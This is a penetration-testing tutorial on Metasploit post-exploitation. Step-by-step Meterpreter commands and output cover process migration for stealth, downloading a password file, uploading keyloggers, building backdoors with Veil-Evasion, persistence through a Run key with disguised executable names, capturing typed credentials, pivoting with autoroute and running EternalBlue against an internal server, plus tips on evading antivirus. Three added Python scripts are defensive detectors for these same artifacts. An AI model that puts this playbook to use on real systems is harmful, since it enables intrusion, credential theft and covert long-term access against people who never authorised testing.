🔐 Post-Exploitation Guide

Comprehensive Tutorial for Ethical Hacking & Penetration Testing

⚠️ FOR EDUCATIONAL PURPOSES ONLY - Use only on systems you own or have explicit permission to test

📚 Introduction to Post-Exploitation

Post-exploitation refers to the actions performed after successfully gaining access to a target system. This phase is crucial for maintaining access, gathering information, and expanding your foothold within a network.

Post-Exploitation Workflow

Initial Access → Information Gathering → Privilege Escalation → Maintain Access → Data Exfiltration

Key Objectives:
  • Maintain persistent access to the compromised system
  • Gather sensitive information and credentials
  • Escalate privileges when possible
  • Use compromised systems as pivot points
  • Avoid detection by security software

🎯 Meterpreter Basic Commands

Meterpreter is a powerful payload that provides an interactive shell for controlling compromised systems. Below are essential commands for basic operations.

Command           Description                            Example
-------           -----------                            -------
help              Display available commands             > help
background        Background the current session         > background
sessions -l       List all active sessions               > sessions -l
sessions -i [id]  Interact with a specific session       > sessions -i 1
sysinfo           Display system information             > sysinfo
getuid            Show current user identity             > getuid
ipconfig          Display network interface information  > ipconfig
ps                List running processes                 > ps
migrate [pid]     Migrate to another process             > migrate 2116

Session Management Example

Backgrounding and Re-engaging Sessions

meterpreter > background
[*] Backgrounding session 1...

msf6 exploit(multi/handler) > sessions -l

Active sessions
===============
  Id  Name  Type                     Information         Connection
  --  ----  ----                     -----------         ----------
  1         meterpreter x86/windows  WIN10\User @ WIN10  192.168.1.5:4444 -> 192.168.1.10:49872

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Process Migration

Why Migrate Processes?

Migrating to a more stable process (like explorer.exe) ensures:

  • Your session persists even if the original exploited application closes
  • Better stealth by hiding within legitimate system processes
  • Access to process-specific privileges and resources

Migration Example

meterpreter > ps
Process List
============
 PID   Name          User
 ---   ----          ----
 2116  explorer.exe  WIN10\User
 3428  chrome.exe    WIN10\User
 4592  firefox.exe   WIN10\User

meterpreter > migrate 2116
[*] Migrating from 1234 to 2116...
[*] Migration completed successfully.
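Migration parks the session inside a process the user expects to see, so on the defensive side the tell is not the process name but what that process is doing. The script below is an added example, not code from the original tutorial: it correlates a constructed `tasklist /fo csv` listing with constructed `netstat -ano` lines and flags ESTABLISHED connections owned by processes that should not hold outbound sessions on a workstation. The `NO_OUTBOUND_EXPECTED` list, the PIDs and the addresses are assumptions chosen to mirror the scenario above (PID 2116 talking to 192.168.1.5:4444).

```python
"""
Added example (not part of the original tutorial): correlate a process list
with TCP connections to spot shell-like sessions hiding in a desktop process.

Input lines are constructed in the shape of Windows `tasklist /fo csv` and
`netstat -ano` output; the PIDs and addresses mirror the tutorial's scenario
(session migrated into explorer.exe, PID 2116, talking to 192.168.1.5:4444).
"""
import csv
import io

# Processes that have no business holding an outbound TCP session on a workstation.
# This list is an assumption for the example; tune it per environment.
NO_OUTBOUND_EXPECTED = {"explorer.exe", "notepad.exe", "winlogon.exe", "lsass.exe"}

# Constructed sample: `tasklist /fo csv` style lines.
TASKLIST_CSV = '''"Image Name","PID","Session Name","Session#","Mem Usage"
"explorer.exe","2116","Console","1","65,212 K"
"chrome.exe","3428","Console","1","210,004 K"
"firefox.exe","4592","Console","1","180,112 K"
'''

# Constructed sample: `netstat -ano` style lines (proto, local, remote, state, pid).
NETSTAT_TEXT = '''  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.10:49872     192.168.1.5:4444       ESTABLISHED     2116
  TCP    192.168.1.10:50120     142.250.74.36:443      ESTABLISHED     3428
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
'''


def parse_tasklist(text):
    """Return {pid: image_name} from tasklist CSV output."""
    reader = csv.DictReader(io.StringIO(text))
    return {int(row["PID"]): row["Image Name"].lower() for row in reader}


def parse_netstat(text):
    """Return a list of (proto, local, remote, state, pid) for TCP rows only."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":
            continue  # header line, UDP rows, or anything malformed
        proto, local, remote, state, pid = parts
        conns.append((proto, local, remote, state, int(pid)))
    return conns


def suspicious_connections(tasklist_text, netstat_text):
    """
    Flag ESTABLISHED connections owned by processes that should not make
    outbound connections. Returns a list of (image, pid, remote) tuples.
    """
    procs = parse_tasklist(tasklist_text)
    findings = []
    for _proto, _local, remote, state, pid in parse_netstat(netstat_text):
        if state != "ESTABLISHED":
            continue
        image = procs.get(pid, "<unknown>")
        if image in NO_OUTBOUND_EXPECTED:
            findings.append((image, pid, remote))
    return findings


if __name__ == "__main__":
    for image, pid, remote in suspicious_connections(TASKLIST_CSV, NETSTAT_TEXT):
        print(f"ALERT: {image} (PID {pid}) holds an outbound session to {remote}")
```

On a live host the same logic runs over the real `tasklist` and `netstat` output; the point of the allow-list approach is that explorer.exe with an established outbound TCP session is unusual regardless of which remote port it uses, so the check does not depend on recognising a specific handler port.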

📁 File System Operations

Once you have access to a system, navigating and manipulating the file system is essential for gathering intelligence and deploying additional tools.

Command            Description                        Example
-------            -----------                        -------
pwd                Print working directory            > pwd
ls                 List files and directories         > ls
cd [path]          Change directory                   > cd C:\Users\Documents
cat [file]         Display file contents              > cat passwords.txt
download [file]    Download file to attacker machine  > download sensitive.docx
upload [file]      Upload file to target machine      > upload backdoor.exe
execute -f [file]  Execute a file on target           > execute -f tool.exe
shell              Drop into system shell             > shell

Practical File System Example

Navigating and Exfiltrating Data

meterpreter > pwd
C:\Users\Administrator

meterpreter > ls
Listing: C:\Users\Administrator
================================
Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2024-11-15 10:23:45 -0500  Desktop
40777/rwxrwxrwx  0     dir   2024-11-15 10:23:45 -0500  Documents
40777/rwxrwxrwx  0     dir   2024-11-15 10:23:45 -0500  Downloads

meterpreter > cd Downloads
meterpreter > ls
Listing: C:\Users\Administrator\Downloads
==========================================
Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100666/rw-rw-rw-  1024     fil   2024-11-20 14:30:22 -0500  passwords.txt
100666/rw-rw-rw-  2048576  fil   2024-11-19 09:15:33 -0500  database.db

meterpreter > cat passwords.txt
admin:P@ssw0rd123
user1:SecurePass456
dbadmin:DatabaseKey789

meterpreter > download passwords.txt
[*] Downloading: passwords.txt -> /root/passwords.txt
[*] Downloaded 1.00 KiB of 1.00 KiB (100.0%): passwords.txt -> /root/passwords.txt
[*] download : passwords.txt -> /root/passwords.txt

Uploading and Executing Tools

Deploying Additional Payloads

meterpreter > upload /root/tools/keylogger.exe
[*] uploading : /root/tools/keylogger.exe -> keylogger.exe
[*] uploaded : /root/tools/keylogger.exe -> keylogger.exe

meterpreter > execute -f keylogger.exe
Process 5432 created.
Channel 1 created.

⚠️ Important Notes:
  • Always verify file paths before uploading executables
  • Be cautious when executing files - they may trigger security alerts
  • Clean up uploaded files after operations to minimize forensic evidence

🔄 Maintaining Access (Persistence)

Persistence mechanisms ensure continued access to compromised systems even after reboots or credential changes.

Persistence Methods

  • 🔧 Veil-Evasion Service: HTTP/TCP service backdoors
  • ⚙️ Persistence Module: Metasploit persistence exploit
  • 📝 Registry Keys: Startup registry entries
  • 📅 Scheduled Tasks: Automated execution

Method 1: Veil-Evasion Service Backdoors

Veil-Evasion provides service-based backdoors that run automatically at system startup.

  • rev_http_service: HTTP reverse connection service
  • rev_tcp_service: TCP reverse connection service

Creating a Service Backdoor

# Launch Veil-Evasion
root@kali:~# veil-evasion

# List available payloads
[>] list

# Select service payload
[>] use 5
[payload/windows/service/rev_tcp_service >>] info

# Configure LHOST
[payload/windows/service/rev_tcp_service >>] set LHOST 192.168.1.5
[payload/windows/service/rev_tcp_service >>] generate

Method 2: Metasploit Persistence Module

The most reliable method combines a custom backdoor with Metasploit's persistence module.

Complete Persistence Setup

# Background current session
meterpreter > background
[*] Backgrounding session 1...

# Use persistence module
msf6 exploit(multi/handler) > use exploit/windows/local/persistence
msf6 exploit(windows/local/persistence) > show options

# Configure persistence settings
msf6 exploit(windows/local/persistence) > set DELAY 10
msf6 exploit(windows/local/persistence) > set EXE_NAME browser.exe
msf6 exploit(windows/local/persistence) > set SESSION 1
msf6 exploit(windows/local/persistence) > set STARTUP USER

# Show advanced options
msf6 exploit(windows/local/persistence) > show advanced

# Set custom executable
msf6 exploit(windows/local/persistence) > set EXE::CUSTOM /var/www/html/backdoor.exe

# Execute persistence
msf6 exploit(windows/local/persistence) > exploit

[*] Running module against WIN10
[+] Persistent agent sent to target
[*] Installed into C:\Users\Administrator\AppData\Local\Temp\
[*] Installed as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\browser
[*] Clean up Meterpreter RC File: /root/.msf4/logs/persistence/WIN10_20241127.rc

Configuration Parameters

Parameter    Description                            Recommended Value
---------    -----------                            -----------------
DELAY        Connection attempt interval (seconds)  10-60 seconds
EXE_NAME     Process name for backdoor              browser.exe, svchost.exe
SESSION      Active Meterpreter session ID          Current session number
STARTUP      Privilege level (USER/SYSTEM)          USER (less detectable)
EXE::CUSTOM  Path to custom backdoor                Full path to payload

Testing Persistence

Verifying Persistent Access

# Kill all sessions
msf6 exploit(windows/local/persistence) > sessions -K
[*] Killing all sessions...

# Restart target computer (simulated)
# Target reboots...

# Set up listener
msf6 exploit(windows/local/persistence) > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST 192.168.1.5
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > exploit

[*] Started HTTP reverse handler on http://192.168.1.5:8080
[*] http://192.168.1.5:8080 handling request from 192.168.1.10
[*] Meterpreter session 1 opened (192.168.1.5:8080 -> 192.168.1.10:49873)

meterpreter > sysinfo
Computer : WIN10
OS : Windows 10 (10.0 Build 19044)
Architecture : x64
System Language : en_US
Meterpreter : x86/windows

⚠️ Detection Risks:
  • Persistence mechanisms are often flagged by antivirus software
  • Registry modifications may trigger security alerts
  • Use custom, obfuscated payloads for better evasion
  • Consider cleanup procedures before engagement ends
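The Run-key entry the module reports above (value `browser`, payload dropped under `AppData\Local\Temp`) is exactly the kind of artifact an autostart audit catches, which is why the registry route is flagged so readily. The script below is an added example, not code from the tutorial or from Metasploit: it parses a constructed `.reg`-style export of the HKCU Run key and flags values whose executable lives in a user-writable drop directory. The directory list, the sample entries and the value names are assumptions for the example.

```python
"""
Added example (not the tutorial's own code): audit Run-key autostart entries
exported from a Windows host and flag the ones a persistence module typically
leaves behind (payload dropped in a temp/profile directory, registered under
a name that imitates a real program).

The input is a constructed `reg export`-style fragment; the "browser" entry
mirrors the tutorial's scenario. Paths, names and the drop-directory list are
assumptions for the example.
"""
import re

RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"

# Constructed sample in the shape of a `reg export` (.reg) file.
REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"browser"="C:\\Users\\Administrator\\AppData\\Local\\Temp\\browser.exe"
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
'''

# Directory fragments that legitimate autostart entries rarely run from (assumed list).
WRITABLE_DROP_DIRS = ("\\appdata\\local\\temp\\", "\\temp\\", "\\downloads\\", "\\public\\")


def parse_run_entries(reg_text):
    """Return {value_name: command} for the Run key in a .reg export."""
    entries = {}
    in_key = False
    for line in reg_text.splitlines():
        if line.startswith("["):
            # A bracketed line opens a new key; only collect values under the Run key.
            in_key = line.strip("[]").lower() == RUN_KEY.lower()
            continue
        m = re.match(r'^"([^"]+)"="(.*)"$', line)
        if in_key and m:
            name, value = m.group(1), m.group(2)
            # .reg files escape backslashes and embedded quotes; undo that.
            entries[name] = value.replace("\\\\", "\\").replace('\\"', '"')
    return entries


def image_path(command):
    """Extract the executable path from a command line (quoted or bare)."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.index('"', 1)]
    return command.split(" ")[0]


def flag_suspicious(entries):
    """Return [(name, path, reason)] for entries launched from drop directories."""
    findings = []
    for name, command in entries.items():
        path = image_path(command).lower()
        for frag in WRITABLE_DROP_DIRS:
            if frag in path:
                findings.append((name, path, f"autostart from user-writable dir {frag}"))
                break
    return findings


if __name__ == "__main__":
    for name, path, reason in flag_suspicious(parse_run_entries(REG_EXPORT)):
        print(f"ALERT: Run value '{name}' -> {path}: {reason}")
```

The same parser works on a real export produced with `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg`; extending it to the HKLM Run and RunOnce keys is a matter of adding the key paths, and pairing the path check with a signature or hash check on the target file tightens it further.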

⌨️ Keylogging and Screen Capture

Capturing keystrokes and screenshots provides valuable intelligence about user activities, credentials, and sensitive information.

Built-in Meterpreter Keylogger

Command        Description                  Usage
-------        -----------                  -----
keyscan_start  Start keystroke capture      > keyscan_start
keyscan_dump   Display captured keystrokes  > keyscan_dump
keyscan_stop   Stop keystroke capture       > keyscan_stop
screenshot     Capture screen image         > screenshot

Keylogging Example Scenario

Capturing Login Credentials

# Start keylogger
meterpreter > keyscan_start
Starting the keystroke sniffer ...

# User activity on target (visiting facebook.com)
# User types: facebook.com [ENTER]
# User types: [email protected] [TAB]
# User types: MySecureP@ssw0rd123 [ENTER]

# Dump captured keystrokes
meterpreter > keyscan_dump
Dumping captured keystrokes...
facebook.com<CR>
[email protected]<Tab>MySecureP@ssw0rd123<CR>

# Stop keylogger
meterpreter > keyscan_stop
Stopping the keystroke sniffer...

Result: Successfully captured the email ([email protected]) and password (MySecureP@ssw0rd123) even though the site uses HTTPS: TLS protects the data in transit, but the keylogger reads keystrokes on the endpoint before the browser encrypts them.

Screen Capture Example

Taking Screenshots

meterpreter > screenshot
Screenshot saved to: /root/screenshot_2024-11-27_15-32-41.jpeg

# View on attacker machine
root@kali:~# ls -lh /root/screenshot*
-rw-r--r-- 1 root root 234K Nov 27 15:32 /root/screenshot_2024-11-27_15-32-41.jpeg

root@kali:~# xdg-open /root/screenshot_2024-11-27_15-32-41.jpeg

Keylogging Attack Flow

User Types Credentials → Keylogger Captures Input → Data Stored in Memory → Attacker Dumps Log → Credentials Exfiltrated

Advanced Keylogging Options

External Keylogger Tools:

For more advanced features, consider uploading dedicated keylogger applications:

  • Portable keyloggers: Standalone executables with advanced logging
  • Features: Application-specific capture, clipboard monitoring, time-stamped logs
  • Deployment: Upload via Meterpreter and execute in background

Uploading External Keylogger

meterpreter > upload /root/tools/advanced-keylogger.exe
[*] uploading : /root/tools/advanced-keylogger.exe -> advanced-keylogger.exe
[*] uploaded : /root/tools/advanced-keylogger.exe -> advanced-keylogger.exe

meterpreter > execute -f advanced-keylogger.exe -H
Process 6789 created.
[*] Running in background with PID 6789

⚠️ Legal and Ethical Considerations:
  • Keylogging without authorization is illegal in most jurisdictions
  • Use only on systems you own or have explicit written permission to test
  • Captured data may include highly sensitive personal information
  • Ensure proper data handling and destruction protocols

🔀 Pivoting and Network Exploitation

Pivoting allows you to use a compromised system as a gateway to access other systems on the internal network that are not directly accessible from your attacking machine.

Pivoting Network Architecture

  • 💻 Attacker (External Network): 192.168.1.5
  • 🖥️ Compromised Host (DMZ/Gateway): 192.168.1.10 and 10.0.0.5 (one interface on each network)
  • 🗄️ Internal Server (Internal Network): 10.0.0.50
  • 💼 Workstation (Internal Network): 10.0.0.100

The compromised host acts as a pivot point, providing access to the internal network (10.0.0.0/24).

Pivoting Concept

What is Pivoting?

Pivoting is the technique of using a compromised system to attack other systems on the same network. This is crucial when:

  • Target systems are on internal networks not directly accessible
  • Firewall rules prevent direct external access
  • You need to appear as an internal user for attacks
  • Lateral movement within an organization is required

Using Autoroute for Pivoting

Autoroute is a Metasploit post-exploitation module that adds routes through a compromised session, so that other Metasploit modules can reach the routed subnet via that session instead of directly from the attacking machine.

Setting Up Autoroute

# From active Meterpreter session, check network interfaces
meterpreter > ipconfig

Interface 1
============
Name : Ethernet 1
Hardware MAC : 00:0c:29:45:67:89
MTU : 1500
IPv4 Address : 192.168.1.10
IPv4 Netmask : 255.255.255.0

Interface 2
============
Name : Ethernet 2
Hardware MAC : 00:0c:29:45:67:8a
MTU : 1500
IPv4 Address : 10.0.0.5
IPv4 Netmask : 255.255.255.0

# Background the session
meterpreter > background
[*] Backgrounding session 1...

# Load autoroute module
msf6 exploit(multi/handler) > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > show options

# Configure autoroute
msf6 post(multi/manage/autoroute) > set SUBNET 10.0.0.0
msf6 post(multi/manage/autoroute) > set NETMASK 255.255.255.0
msf6 post(multi/manage/autoroute) > set SESSION 1

# Execute autoroute
msf6 post(multi/manage/autoroute) > exploit

[*] Running module against WIN10
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.0.0/255.255.255.0 from host's routing table.
[*] Post module execution completed

Autoroute Configuration

Parameter  Description                           Example
---------  -----------                           -------
SUBNET     Target internal subnet IP             10.0.0.0
NETMASK    Subnet mask for routing               255.255.255.0
SESSION    Compromised session to pivot through  1

Exploiting Through the Pivot

Attacking Internal Systems

# Scan internal network through pivot
msf6 post(multi/manage/autoroute) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.0.0.0/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 80,443,445,3389
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 10.0.0.50:445 - TCP OPEN
[+] 10.0.0.50:3389 - TCP OPEN
[+] 10.0.0.100:80 - TCP OPEN
[+] 10.0.0.100:445 - TCP OPEN

# Exploit vulnerable internal system
msf6 auxiliary(scanner/portscan/tcp) > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.0.0.50
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.5
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.5:4444
[*] 10.0.0.50:445 - Connecting to target for exploitation.
[+] 10.0.0.50:445 - Connection established for exploitation.
[*] Sending stage (200262 bytes) to 10.0.0.50
[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 10.0.0.50:49158)

meterpreter > sysinfo
Computer : INTERNAL-SERVER
OS : Windows Server 2012 R2 (6.3 Build 9600)
Architecture : x64
System Language : en_US
Meterpreter : x64/windows

Pivoting Attack Flow

Compromise Edge System → Identify Internal Networks → Configure Autoroute → Scan Internal Systems → Exploit Internal Targets

Additional Pivoting Techniques

Other Pivoting Methods:
  • Port Forwarding: Forward specific ports through the compromised host
  • SOCKS Proxy: Set up a SOCKS proxy for browser-based access
  • SSH Tunneling: Use SSH dynamic port forwarding for encrypted pivoting
  • VPN Deployment: Establish VPN connections for full network access

Port Forwarding Example

# Forward internal RDP port to local machine
meterpreter > portfwd add -l 3389 -p 3389 -r 10.0.0.50
[*] Local TCP relay created: :3389 <-> 10.0.0.50:3389

# Now connect to localhost:3389 to access internal server RDP
root@kali:~# rdesktop localhost:3389

⚠️ Pivoting Considerations:
  • Network traffic through pivots may be slower
  • Monitor bandwidth usage to avoid detection
  • Firewall rules on pivot host may affect routing
  • Session stability is critical - maintain multiple pivots if possible
  • Clean up routes and forwarding rules after assessment
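From the network side, a scan pushed through autoroute shows up as the pivot host's internal address (10.0.0.5 above) touching many host:port pairs in a short time, whether or not the firewall allows each probe; that breadth is what an internal sensor keys on. The following is an added example, not part of the original tutorial, that reads constructed flow-log lines in a generic `<timestamp> <src> -> <dst> <proto> <action>` layout and reports any source that exceeds a distinct-target threshold inside a sliding window. The log format, the threshold and the window length are assumptions.

```python
"""
Added example (not from the original tutorial): detect an internal port sweep
coming from a single source, the traffic pattern a scan through a pivot host
produces. Log lines are constructed in a generic firewall/flow format and
mirror the tutorial's scenario: the pivot's internal address 10.0.0.5 probing
10.0.0.0/24 on 80/443/445/3389. Layout and thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime

# Constructed flow records: "<timestamp> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <proto> <action>"
FLOW_LOG = """\
2024-11-27T15:40:01 10.0.0.5:51001 -> 10.0.0.50:80 TCP DROP
2024-11-27T15:40:01 10.0.0.5:51002 -> 10.0.0.50:443 TCP DROP
2024-11-27T15:40:01 10.0.0.5:51003 -> 10.0.0.50:445 TCP ALLOW
2024-11-27T15:40:01 10.0.0.5:51004 -> 10.0.0.50:3389 TCP ALLOW
2024-11-27T15:40:02 10.0.0.5:51005 -> 10.0.0.100:80 TCP ALLOW
2024-11-27T15:40:02 10.0.0.5:51006 -> 10.0.0.100:443 TCP DROP
2024-11-27T15:40:02 10.0.0.5:51007 -> 10.0.0.100:445 TCP ALLOW
2024-11-27T15:40:02 10.0.0.5:51008 -> 10.0.0.100:3389 TCP DROP
2024-11-27T15:40:03 10.0.0.5:51009 -> 10.0.0.51:445 TCP DROP
2024-11-27T15:40:03 10.0.0.5:51010 -> 10.0.0.52:445 TCP DROP
2024-11-27T15:40:03 10.0.0.5:51011 -> 10.0.0.53:445 TCP DROP
2024-11-27T15:41:10 10.0.0.100:52000 -> 10.0.0.50:445 TCP ALLOW
2024-11-27T15:42:30 10.0.0.100:52001 -> 10.0.0.50:3389 TCP ALLOW
"""

WINDOW_SECONDS = 60       # sliding window per source (assumed)
MIN_DISTINCT_TARGETS = 5  # distinct (dst_ip, dst_port) pairs before alerting (assumed)


def parse_flows(text):
    """Yield (ts, src_ip, dst_ip, dst_port, action) tuples from the flow log."""
    for line in text.splitlines():
        ts, src, _arrow, dst, _proto, action = line.split()
        src_ip = src.rsplit(":", 1)[0]
        dst_ip, dst_port = dst.rsplit(":", 1)
        yield datetime.fromisoformat(ts), src_ip, dst_ip, int(dst_port), action


def detect_sweeps(text, window=WINDOW_SECONDS, threshold=MIN_DISTINCT_TARGETS):
    """
    Return {src_ip: (distinct_targets, first_ts, last_ts)} for sources that touch
    at least `threshold` distinct (dst_ip, dst_port) pairs within `window` seconds.
    Dropped and allowed flows both count: a sweep is defined by breadth, not success.
    """
    per_src = defaultdict(list)
    for ts, src_ip, dst_ip, dst_port, _action in parse_flows(text):
        per_src[src_ip].append((ts, (dst_ip, dst_port)))

    alerts = {}
    for src_ip, events in per_src.items():
        events.sort()
        left = 0
        for right in range(len(events)):
            # Advance the left edge until the window fits inside `window` seconds.
            while (events[right][0] - events[left][0]).total_seconds() > window:
                left += 1
            targets = {target for _ts, target in events[left:right + 1]}
            if len(targets) >= threshold:
                alerts[src_ip] = (len(targets), events[left][0], events[right][0])
    return alerts


if __name__ == "__main__":
    for src, (count, first, last) in detect_sweeps(FLOW_LOG).items():
        print(f"ALERT: {src} probed {count} distinct host:port pairs between {first} and {last}")
```

The workstation 10.0.0.100 also talks to the internal server in the sample, but only to two targets over several minutes, so it stays below the threshold; the pivot address trips the rule on the third second of the scan. On a real network the same rule is more useful when the source is a DMZ host that should have no reason to enumerate internal systems at all.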

📋 Post-Exploitation Summary

Complete Post-Exploitation Process

Initial Access → System Enumeration → Privilege Escalation → Establish Persistence → Data Collection → Lateral Movement

Key Takeaways

  • Session Management: Always background sessions and maintain multiple access points
  • Stealth: Migrate to stable processes (explorer.exe) to avoid detection
  • Persistence: Use registry keys and services for reliable long-term access
  • Information Gathering: Collect system info, network details, and running processes
  • Data Exfiltration: Download sensitive files and capture credentials via keylogging
  • Network Expansion: Use pivoting to access internal networks and additional systems
  • Cleanup: Always maintain cleanup scripts to remove artifacts after assessment

Best Practices Checklist

Task                             Status           Notes
----                             ------           -----
✅ Migrate to stable process     Critical         Use explorer.exe or system processes
✅ Establish persistence         High Priority    Multiple methods for redundancy
✅ Document all actions          Essential        Maintain detailed logs for reporting
✅ Collect system information    High Priority    OS, architecture, users, network
✅ Identify pivot opportunities  Medium Priority  Check for multiple network interfaces
✅ Test evasion techniques       Medium Priority  Verify AV bypass effectiveness
✅ Prepare cleanup procedures    Critical         Save RC files for artifact removal